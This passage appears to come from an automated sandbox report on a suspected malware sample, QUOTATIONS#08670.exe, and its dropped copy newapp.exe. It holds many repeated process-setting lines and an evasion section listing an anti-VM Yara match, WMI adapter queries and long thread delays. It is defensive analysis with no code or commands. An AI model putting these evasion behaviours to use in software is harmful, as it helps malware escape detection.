                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 8F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 4690000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 7BC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 8BC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 8D90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 9D90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: A120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: B120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: C120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 1460000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeMemory allocated: 5060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 16D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 8120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 9120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 92E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: A2E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: A650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: B650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: C650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 7AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 8AC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: 9FF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: AFF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMemory allocated: BFF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599763Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598519Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598318Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597263Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596700Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595811Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595662Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595428Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594844Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594516Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594406Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeThread delayed: delay time: 594187Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWindow / User API: threadDelayed 2166Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWindow / User API: threadDelayed 7687Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeWindow / User API: threadDelayed 2951Jump to behavior
